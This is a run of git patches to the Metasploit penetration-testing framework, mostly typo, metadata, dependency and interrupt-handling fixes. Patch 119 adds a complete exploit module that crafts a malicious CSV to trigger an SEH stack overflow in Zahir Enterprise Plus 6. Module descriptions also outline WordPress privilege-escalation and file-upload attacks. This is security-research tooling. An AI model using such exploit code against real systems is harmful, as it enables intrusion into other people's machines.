Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 28 Sep 2018 16:20:11 -0500 Subject: [PATCH 117/192] note why this is there --- metasploit-framework.gemspec | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 19a062549a..50a69d323b 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -131,8 +131,8 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'dnsruby' spec.add_runtime_dependency 'mqtt' spec.add_runtime_dependency 'net-ssh' + spec.add_runtime_dependency 'ed25519' # Adds ed25519 keys for net-ssh spec.add_runtime_dependency 'bcrypt_pbkdf' - spec.add_runtime_dependency 'ed25519' spec.add_runtime_dependency 'ruby_smb' # From 5dcb6ab32190cdc6fafa4e69f8a635dff770f0e4 Mon Sep 17 00:00:00 2001 From: jgor Date: Fri, 28 Sep 2018 16:53:12 -0500 Subject: [PATCH 118/192] fix typo in route command examples --- lib/msf/ui/console/command_dispatcher/core.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 991b642d38..2e5a858b7d 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -821,7 +821,7 @@ class Core print_line " print - show all active routes" print_line print_line "Examples:" - print_line " Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1" + print_line " Add a route for all hosts from 192.168.0.0 to 192.168.0.255 through session 1" print_line " route add 192.168.0.0 255.255.255.0 1" print_line " route add 192.168.0.0/24 1" print_line From ff560ee99096227fc401794e7717234a28865e63 Mon Sep 17 00:00:00 2001 From: modpr0be Date: Sat, 29 Sep 2018 18:59:14 +0700 Subject: [PATCH 119/192] Add test for Zahir 0day exploit Add test for Zahir 0day exploit, need to test more e.g. VirtualBox or Physical machines. --- .../fileformat/zahir_enterprise_plus_csv.rb | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb diff --git a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb new file mode 100644 index 0000000000..3f95007619 --- /dev/null +++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb @@ -0,0 +1,70 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info={}) + super(update_info(info, + 'Name' => "Zahir Enterprise Plus 6 Stack Buffer Overflow Exploit", + 'Description' => %q{ + This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below. + The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters + via Import from other File. This results in overwriting a structured exception handler record. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'f3ci', # found the vulnerability + 'modpr0be' # Metasploit Module + ], + 'References' => + [ + [ 'CVE', '2018-17408' ], + [ 'EDB', '38035' ] + ], + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal', + { + 'Ret' => 0x52016661, # P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl) + 'Offset' => 3041 + } + ] + ], + 'Payload' => + { + 'Space' => 5000, + 'BadChars' => "\x00\x0a\x0d\x22\x2c" + }, + 'Privileged' => false, + 'DisclosureDate' => "Sept 28 2018", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The malicious file name', 'msf.csv']) + ]) + end + + def exploit + + buf = rand_text_alpha_upper(target['Offset']) + buf << "\n\r" # crash chars + buf << rand_text_alpha_upper(380) # extra chars to hit the offset + buf << generate_seh_record(target.ret) + buf << make_nops(12) + buf << payload.encoded + # Size isn't very sensitive + buf << rand_text_alpha_upper(1200) + + file_create(buf) + end +end From 90b98a193c2ef19fbd90a02f95def3f482956c94 Mon Sep 17 00:00:00 2001 From: Green-m Date: Tue, 25 Sep 2018 11:28:59 +0800 Subject: [PATCH 120/192] Refactor the rhosts for exploit modules. --- lib/msf/base/simple/exploit.rb | 3 + lib/msf/core/exploit.rb | 8 ++ lib/msf/core/exploit_driver.rb | 19 ++- .../ui/console/command_dispatcher/exploit.rb | 109 +++++++++++------- 4 files changed, 97 insertions(+), 42 deletions(-) diff --git a/lib/msf/base/simple/exploit.rb b/lib/msf/base/simple/exploit.rb index 09e670ffd9..eb4acd7e3d 100644 --- a/lib/msf/base/simple/exploit.rb +++ b/lib/msf/base/simple/exploit.rb @@ -78,6 +78,9 @@ module Exploit # Start it up driver = ExploitDriver.new(exploit.framework) + # Keep the handler of driver running if exploit multi targets. + driver.keep_handler = true if opts["multi"] + # Initialize the driver instance driver.exploit = exploit driver.payload = exploit.framework.payloads.create(opts['Payload']) diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index b1be00f70d..bebe7be9da 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -1410,6 +1410,12 @@ class Exploit < Msf::Module self.print_error("Exploit failed [#{self.fail_reason}]: #{msg}") elog("Exploit failed (#{self.refname}): #{msg}", 'core', LEV_0) dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3) + + when ::Interrupt + self.fail_reason = Msf::Exploit::Failure::UserInterrupt + self.print_error("Exploit failed [#{self.fail_reason}]: #{msg}") + elog("Exploit failed (#{self.refname}): #{msg}", 'core', LEV_0) + dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3) else # Compare as a string since not all error classes may be loaded @@ -1451,6 +1457,8 @@ class Exploit < Msf::Module # Interrupt any session waiters in the handler self.interrupt_handler + + return self.fail_reason end def report_failure diff --git a/lib/msf/core/exploit_driver.rb b/lib/msf/core/exploit_driver.rb index 7debf1419d..e7fc00f54b 100644 --- a/lib/msf/core/exploit_driver.rb +++ b/lib/msf/core/exploit_driver.rb @@ -22,6 +22,7 @@ class ExploitDriver self.use_job = false self.job_id = nil self.force_wait_for_session = false + self.keep_handler = false self.semaphore = Mutex.new end @@ -164,8 +165,15 @@ class ExploitDriver # settings until after they're done. ctx = [ exploit, payload ] - job_run_proc(ctx) - job_cleanup_proc(ctx) + begin + job_run_proc(ctx) + # For multi exploit targets. + # Keep the payload handler until last target or interrupt + job_cleanup_proc(ctx) unless keep_handler + rescue ::Interrupt + job_cleanup_proc(ctx) + raise $! + end end return session @@ -181,6 +189,7 @@ class ExploitDriver attr_accessor :job_id attr_accessor :force_wait_for_session # :nodoc: attr_accessor :session # :nodoc: + attr_accessor :keep_handler # :nodoc: # To synchronize threads cleaning up the exploit and the handler attr_accessor :semaphore @@ -211,7 +220,7 @@ protected delay = 0.01 end - exploit.handle_exception e + fail_reason = exploit.handle_exception(e) end # Start bind handlers after exploit completion @@ -237,6 +246,10 @@ protected exploit.fail_detail = "No session created" exploit.report_failure end + + if fail_reason && fail_reason == Msf::Exploit::Failure::UserInterrupt + raise ::Interrupt + end end # diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index eadb76c7c7..6d03198802 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -47,6 +47,9 @@ class Exploit "Exploit" end + # + # Launches an exploitation single attempt. + # def exploit_single(mod, opts) begin session = mod.exploit_simple(opts) @@ -63,41 +66,7 @@ class Exploit end end - # If we were given a session, let's see what we can do with it - if session - if !opts['Background'] && session.interactive? - # If we aren't told to run in the background and the session can be - # interacted with, start interacting with it by issuing the session - # interaction command. - print_line - - driver.run_single("sessions -q -i #{session.sid}") - # Otherwise, log that we created a session - else - # Otherwise, log that we created a session - print_status("Session #{session.sid} created in the background.") - end - - elsif opts['RunAsJob'] && mod.job_id - # Indicate if he exploit as a job, indicate such so the user doesn't - # wonder what's up. - print_status("Exploit running as background job #{mod.job_id}.") - # Worst case, the exploit ran but we got no session, bummer. - - else - # If we didn't run a payload handler for this exploit it doesn't - # make sense to complain to the user that we didn't get a session - unless mod.datastore["DisablePayloadHandler"] - fail_msg = 'Exploit completed, but no session was created.' - print_status(fail_msg) - begin - framework.events.on_session_fail(fail_msg) - rescue ::Exception => e - wlog("Exception in on_session_open event handler: #{e.class}: #{e}") - wlog("Call Stack\n#{e.backtrace.join("\n")}") - end - end - end + return session end def cmd_exploit_tabs(str, words) @@ -117,11 +86,12 @@ class Exploit end # - # Launches an exploitation attempt. + # Launches exploitation attempts. # def cmd_exploit(*args) force = false module_opts = [] + any_session = false opts = { 'Encoder' => mod.datastore['ENCODER'], 'Payload' => mod.datastore['PAYLOAD'], @@ -195,14 +165,75 @@ class Exploit end rhosts = mod.datastore['RHOSTS'] + # For mutilple targets exploit attempts. if rhosts - Rex::Socket::RangeWalker.new(rhosts).each do |rhost| + opts[:multi] = true + rhosts_range = Rex::Socket::RangeWalker.new(rhosts) + rhosts_range.each do |rhost| nmod = mod.replicant nmod.datastore['RHOST'] = rhost - exploit_single(nmod, opts) + # If rhost is the last target, let exploit handler stop. + opts["multi"] = false if rhost == (Rex::Socket.addr_itoa(rhosts_range.ranges.first.stop)) + # Catch the interrupt exception to stop the whole module during exploit + begin + print_status("Exploiting target #{rhost}") + session = exploit_single(nmod, opts) + rescue ::Interrupt + print_status("Stopping exploiting current target #{rhost}...") + print_status("Control-C again to force quit exploiting all targets.") + begin + Rex.sleep(1) + rescue ::Interrupt + raise $! + end + end + # If we were given a session, report it. + if session + print_status("Session #{session.sid} created in the background.") + any_session = true + end end + # For single target. else - exploit_single(mod, opts) + session = exploit_single(mod, opts) + # If we were given a session, let's see what we can do with it + if session + any_session = true + if !opts['Background'] && session.interactive? + # If we aren't told to run in the background and the session can be + # interacted with, start interacting with it by issuing the session + # interaction command. + print_line + + driver.run_single("sessions -q -i #{session.sid}") + # Otherwise, log that we created a session + else + # Otherwise, log that we created a session + print_status("Session #{session.sid} created in the background.") + end + + elsif opts['RunAsJob'] && mod.job_id + # Indicate if he exploit as a job, indicate such so the user doesn't + # wonder what's up. + print_status("Exploit running as background job #{mod.job_id}.") + # Worst case, the exploit ran but we got no session, bummer. + end + end + + # If we didn't get any session and exploit ended luanch. + unless any_session + # If we didn't run a payload handler for this exploit it doesn't + # make sense to complain to the user that we didn't get a session + unless mod.datastore["DisablePayloadHandler"] + fail_msg = 'Exploit completed, but no session was created.' + print_status(fail_msg) + begin + framework.events.on_session_fail(fail_msg) + rescue ::Exception => e + wlog("Exception in on_session_open event handler: #{e.class}: #{e}") + wlog("Call Stack\n#{e.backtrace.join("\n")}") + end + end end end From 1b93363588384a2364fde91a61ae0f40bc065870 Mon Sep 17 00:00:00 2001 From: Green-m Date: Sun, 30 Sep 2018 16:07:09 +0800 Subject: [PATCH 121/192] Change the error message when interrupt exploit. --- lib/rex/ui/text/dispatcher_shell.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb index 3b6b972202..cc473e3798 100644 --- a/lib/rex/ui/text/dispatcher_shell.rb +++ b/lib/rex/ui/text/dispatcher_shell.rb @@ -454,6 +454,7 @@ module DispatcherShell found = true end rescue ::Interrupt + found = true print_error("#{method}: Interrupted") raise if propagate_errors rescue OptionParser::ParseError => e From 072071871625a58018c4488370d987ea0ab1bacb Mon Sep 17 00:00:00 2001 From: Delfan Azhar Andhika <16264678+delfaaan@users.noreply.github.com> Date: Mon, 1 Oct 2018 02:55:53 +0700 Subject: [PATCH 122/192] Update reverse_tcp.md fix typos line 33. --- .../modules/payload/windows/meterpreter/reverse_tcp.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md index 1780ce84ce..051d481525 100644 --- a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md @@ -30,7 +30,7 @@ Another way to use windows/meterpreter/reverse_tcp is to generate it as an execu you would want to do it with msfvenom. If you are old school, you have probably also heard of msfpayload and msfencode. msfvenom is a replacement of those. -The following is a basic example of using msfvenom to to generate windows/meterpreter/reverse_tcp +The following is a basic example of using msfvenom to generate windows/meterpreter/reverse_tcp as an executable: ``` From af2378d6ec9f7553e5558b4128be9a47589fc8a7 Mon Sep 17 00:00:00 2001 From: Delfan Azhar Andhika <16264678+delfaaan@users.noreply.github.com> Date: Mon, 1 Oct 2018 03:03:50 +0700 Subject: [PATCH 123/192] Update reverse_tcp.md fix typos in line 264. --- .../modules/payload/windows/meterpreter/reverse_tcp.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md index 1780ce84ce..f82d153710 100644 --- a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md @@ -261,7 +261,7 @@ meterpreter > getsystem **hashdump** The ```hashdump``` commands allows you to dump the Windows hashes if there are the right privileges. -For sxample: +For example: ``` meterpreter > hashdump From 37dc0ce64d441dc8ff682fb522382f402303cbde Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 1 Oct 2018 16:54:46 +0800 Subject: [PATCH 124/192] fix post/android/gather/subinfo.rb path --- modules/post/android/{ => gather}/sub_info.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/post/android/{ => gather}/sub_info.rb (100%) diff --git a/modules/post/android/sub_info.rb b/modules/post/android/gather/sub_info.rb similarity index 100% rename from modules/post/android/sub_info.rb rename to modules/post/android/gather/sub_info.rb From 7842174d8b80cee8f394b41d20a920454dfffe9e Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 1 Oct 2018 12:41:39 -0500 Subject: [PATCH 125/192] Fix loading external modules without notes --- lib/msf/core/modules/external/shim.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/modules/external/shim.rb b/lib/msf/core/modules/external/shim.rb index d9588e2286..495e93d9d1 100644 --- a/lib/msf/core/modules/external/shim.rb +++ b/lib/msf/core/modules/external/shim.rb @@ -144,6 +144,8 @@ class Msf::Modules::External::Shim # ensure that they are properly capitalized before rendering. # def self.transform_notes(notes) + return {} unless notes + notes.reduce({}) do |acc, (key, val)| acc[key.upcase] = val acc From 549ef4b21e59e1cb22adcdf3065b5c5e160260b7 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Mon, 1 Oct 2018 12:42:37 -0500 Subject: [PATCH 126/192] fix deps --- Gemfile.lock | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index b62aa23be4..78682b619c 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -234,7 +234,7 @@ GEM thor (>= 0.18.1, < 2.0) rake (12.3.1) rb-readline (0.5.5) - recog (2.1.22) + recog (2.1.24) nokogiri redcarpet (3.4.0) rex-arch (0.1.13) @@ -307,7 +307,7 @@ GEM rspec-rerun (1.1.0) rspec (~> 3.0) rspec-support (3.8.0) - ruby-macho (2.0.0) + ruby-macho (2.1.0) ruby-rc4 (0.1.5) ruby_smb (1.0.4) bindata From 6f5a8f8f42b9c5100d15648db03e11bee759bf2c Mon Sep 17 00:00:00 2001 From: Rob Date: Mon, 1 Oct 2018 18:59:09 +0100 Subject: [PATCH 127/192] Fix outdated metadata --- .../admin/http/wp_easycart_privilege_escalation.rb | 4 ++-- .../auxiliary/admin/http/wp_wplms_privilege_escalation.rb | 4 ++-- modules/auxiliary/dos/http/wordpress_long_password_dos.rb | 6 +++--- modules/auxiliary/gather/wp_all_in_one_migration_export.rb | 4 ++-- .../gather/wp_ultimate_csv_importer_user_extract.rb | 4 ++-- .../http/wp_ninja_forms_unauthenticated_file_upload.rb | 4 ++-- .../exploits/unix/webapp/maarch_letterbox_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_admin_shell_upload.rb | 2 +- .../unix/webapp/wp_easycart_unrestricted_file_upload.rb | 4 ++-- .../exploits/unix/webapp/wp_holding_pattern_file_upload.rb | 4 ++-- .../webapp/wp_photo_gallery_unrestricted_file_upload.rb | 4 ++-- modules/exploits/unix/webapp/wp_symposium_shell_upload.rb | 4 ++-- 12 files changed, 23 insertions(+), 23 deletions(-) diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index f5086898fe..2de378dc3b 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb @@ -22,14 +22,14 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => [ - 'Rob Carr ' # Discovery and Metasploit module + 'rastating' # Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-2673'], ['WPVDB', '7808'], - ['URL', 'http://blog.rastating.com/wp-easycart-privilege-escalation-information-disclosure'] + ['URL', 'https://rastating.github.io/wp-easycart-privilege-escalation-information-disclosure/'] ], 'DisclosureDate' => 'Feb 25 2015' )) diff --git a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb index fa284e6a8b..d67fd75c3b 100644 --- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb @@ -24,8 +24,8 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => [ - 'Evex', # Vulnerability discovery - 'Rob Carr ' # Metasploit module + 'Evex', # Vulnerability discovery + 'rastating' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb index b8991ce4b5..ba0302986b 100644 --- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb @@ -18,9 +18,9 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'Author' => [ - 'Javier Nieto Arevalo', # Vulnerability disclosure - 'Andres Rojas Guerrero', # Vulnerability disclosure - 'Rob Carr ' # Metasploit module + 'Javier Nieto Arevalo', # Vulnerability disclosure + 'Andres Rojas Guerrero', # Vulnerability disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb index 39e806e03c..afa907ab66 100644 --- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb +++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb @@ -18,8 +18,8 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'Author' => [ - 'James Golovich', # Disclosure - 'Rob Carr ' # Metasploit module + 'James Golovich', # Disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb index 6a5ed82bc1..e2e3eea707 100644 --- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb +++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb @@ -23,8 +23,8 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'Author' => [ - 'James Hooker', # Disclosure - 'Rob Carr ' # Metasploit module + 'James Hooker', # Disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb b/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb index 32025f6df2..31d42c70b5 100644 --- a/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb +++ b/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb @@ -22,8 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'James Golovich', # Discovery and disclosure - 'Rob Carr ' # Metasploit module + 'James Golovich', # Discovery and disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb index 8c1fc5d77b..d224fb99a1 100644 --- a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb +++ b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Rob Carr ' + 'rastating' ], 'References' => [ diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb index 4d8e63dec4..bf1a0db7c4 100644 --- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Rob Carr ' # Metasploit module + 'rastating' # Metasploit module ], 'DisclosureDate' => 'Feb 21 2015', 'Platform' => 'php', diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 036578cf18..339c6b1ce8 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -36,8 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Kacper Szurek', # Vulnerability disclosure - 'Rob Carr ' # Metasploit module + 'Kacper Szurek', # Vulnerability disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb index 092da67136..68c49d27ab 100644 --- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb @@ -25,8 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Alexander Borg', # Vulnerability disclosure - 'Rob Carr ' # Metasploit module + 'Alexander Borg', # Vulnerability disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb index 940eb5569a..b4d322135b 100644 --- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb @@ -26,8 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Kacper Szurek', # Vulnerability disclosure - 'Rob Carr ' # Metasploit module + 'Kacper Szurek', # Vulnerability disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb index 465ec6e5f6..13b1cca104 100644 --- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb @@ -25,8 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Claudio Viviani', # Vulnerability disclosure - 'Rob Carr ' # Metasploit module + 'Claudio Viviani', # Vulnerability disclosure + 'rastating' # Metasploit module ], 'References' => [ From e6b7b6cd730dc299f5d1169d934b3aa1215c9ffa Mon Sep 17 00:00:00 2001 From: Metasploit Date: Mon, 1 Oct 2018 11:14:27 -0700 Subject: [PATCH 128/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 50 +++++++++++++++++------------------ 1 file changed, 25 insertions(+), 25 deletions(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 46e4cd1204..d0bcfaf645 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -3874,13 +3874,13 @@ "disclosure_date": "2015-02-25", "type": "auxiliary", "author": [ - "Rob Carr " + "rastating" ], "description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n users of any user level to set any system option via a lack of validation in the\n ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n to prevent any notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default role to\n be administrator. This will allow for the user to create a new account with admin\n privileges via the default registration page found at /wp-login.php?action=register.", "references": [ "CVE-2015-2673", "WPVDB-7808", - "URL-http://blog.rastating.com/wp-easycart-privilege-escalation-information-disclosure" + "URL-https://rastating.github.io/wp-easycart-privilege-escalation-information-disclosure/" ], "is_server": false, "is_client": false, @@ -3903,7 +3903,7 @@ "https" ], "targets": null, - "mod_time": "2017-08-24 21:38:44 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb", "is_install_path": true, "ref_name": "admin/http/wp_easycart_privilege_escalation", @@ -3967,7 +3967,7 @@ "type": "auxiliary", "author": [ "Evex", - "Rob Carr " + "rastating" ], "description": "The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an\n authenticated user of any user level to set any system option due to a lack of\n validation in the import_data function of /includes/func.php.\n\n The module first changes the admin e-mail address to prevent any\n notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default\n role to be administrator. This will allow for the user to create a new account\n with admin privileges via the default registration page found at\n /wp-login.php?action=register.", "references": [ @@ -3994,7 +3994,7 @@ "https" ], "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb", "is_install_path": true, "ref_name": "admin/http/wp_wplms_privilege_escalation", @@ -9250,7 +9250,7 @@ "author": [ "Javier Nieto Arevalo", "Andres Rojas Guerrero", - "Rob Carr " + "rastating" ], "description": "WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x\n before 4.0.1 allows remote attackers to cause a denial of service\n (CPU consumption) via a long password that is improperly handled\n during hashing.", "references": [ @@ -9280,7 +9280,7 @@ "https" ], "targets": null, - "mod_time": "2018-07-12 17:34:52 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/auxiliary/dos/http/wordpress_long_password_dos.rb", "is_install_path": true, "ref_name": "dos/http/wordpress_long_password_dos", @@ -16105,7 +16105,7 @@ "type": "auxiliary", "author": [ "James Golovich", - "Rob Carr " + "rastating" ], "description": "This module allows you to export Wordpress data (such as the database, plugins, themes,\n uploaded files, etc) via the All-in-One Migration plugin without authentication.", "references": [ @@ -16133,7 +16133,7 @@ "https" ], "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/auxiliary/gather/wp_all_in_one_migration_export.rb", "is_install_path": true, "ref_name": "gather/wp_all_in_one_migration_export", @@ -16151,7 +16151,7 @@ "type": "auxiliary", "author": [ "James Hooker", - "Rob Carr " + "rastating" ], "description": "Due to lack of verification of a visitor's permissions, it is possible\n to execute the 'export.php' script included in the default installation of the\n Ultimate CSV Importer plugin and retrieve the full contents of the user table\n in the WordPress installation. This results in full disclosure of usernames,\n hashed passwords and email addresses for all users.", "references": [ @@ -16178,7 +16178,7 @@ "https" ], "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb", "is_install_path": true, "ref_name": "gather/wp_ultimate_csv_importer_user_extract", @@ -67227,7 +67227,7 @@ "type": "exploit", "author": [ "James Golovich", - "Rob Carr " + "rastating" ], "description": "Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain\n an unauthenticated file upload vulnerability, allowing guests\n to upload arbitrary PHP code that can be executed in the context\n of the web server.", "references": [ @@ -67258,7 +67258,7 @@ "targets": [ "ninja-forms" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb", "is_install_path": true, "ref_name": "multi/http/wp_ninja_forms_unauthenticated_file_upload", @@ -75505,7 +75505,7 @@ "disclosure_date": "2015-02-11", "type": "exploit", "author": [ - "Rob Carr " + "rastating" ], "description": "This module exploits a file upload vulnerability on Maarch LetterBox 2.8 due to a lack of\n session and file validation in the file_to_index.php script. It allows unauthenticated\n users to upload files of any type and subsequently execute PHP scripts in the context of\n the web server.", "references": [ @@ -75534,7 +75534,7 @@ "targets": [ "Maarch LetterBox 2.8" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/maarch_letterbox_file_upload", @@ -78271,7 +78271,7 @@ 